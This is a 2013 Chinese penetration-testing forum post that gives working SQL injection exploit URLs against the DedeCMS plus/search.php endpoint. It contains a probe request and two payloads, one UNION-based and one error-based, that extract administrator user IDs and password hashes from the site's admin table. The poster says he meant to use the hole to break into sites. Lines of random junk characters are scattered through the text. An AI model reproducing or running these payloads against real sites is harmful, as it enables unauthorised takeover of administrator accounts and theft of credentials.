中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
9 C; e" ~6 U0 o; D
a/ _4 B# e+ ?6 ~# {1 ~' e
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
4 H5 x0 ?" \& I, b% Z
' \6 [6 V! {9 R
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
) {5 w U. `, O
2 w* |7 e' x& N1 a: y
我一般是这样测试的:
4 _% k2 b T; Q1 d2 N
/ P! _9 O4 o( T
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
. h. ?% [5 ?! W: U1 h
- [+ }* B" g. t! O5 W" J8 @' F
转载不加作者名的没JJ
* m8 O2 t% S( [5 u) S0 S: o9 Q( s
2 o. t. I& e# ^4 T
作者:鬼哥
) z6 D# F1 i5 V% ?8 i. D% ]
0 w9 t- V8 z) y- f
7 M& w) `3 Y9 L- K, ^% E2 e
6 W" ^ A! `) G" k+ z
看结果如果提示
' N- c4 N- w7 q4 G4 Q3 y( u
. D; a9 |7 Q k' C0 U( V" c* j
Safe Alert: Request Error step 2 !
r6 c7 I! W \
$ G3 w- t/ I# G$ e# S2 G8 l( M
那么直接用下面的exp
4 v! `. B2 d: n8 \1 j5 ]4 T3 x9 d8 l% Y
+ L0 L: [( g0 }6 l1 u
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
, n/ i) u( b. r% t9 z
1 u9 R8 v h0 S& E5 W7 p2 f/ i; z
" N$ I7 f# a5 t# G" g
看结果如果提示
) a, L$ r% O# i
8 c* m! ^# h L1 K5 {& P
Safe Alert: Request Error step 1 !
+ ]: W Q) L$ a/ L3 Q( @
9 O) e# f% }5 }3 p. s
那么直接用下面的exp
0 v+ A. K1 p- p" ^+ k- c
! S( o. s% W) k4 K# R$ X
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
% M3 L6 N5 r4 L) ~/ C9 d3 }
/ m Z0 y* ~! ]+ o6 M, q4 K
& S' T) S9 j5 K+ e8 R8 q
如果正常显示证明漏洞不存在了。
+ N% f) l/ b4 |7 O6 F+ [: `
% _/ \1 g/ @( E& H6 y E/ P. q
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2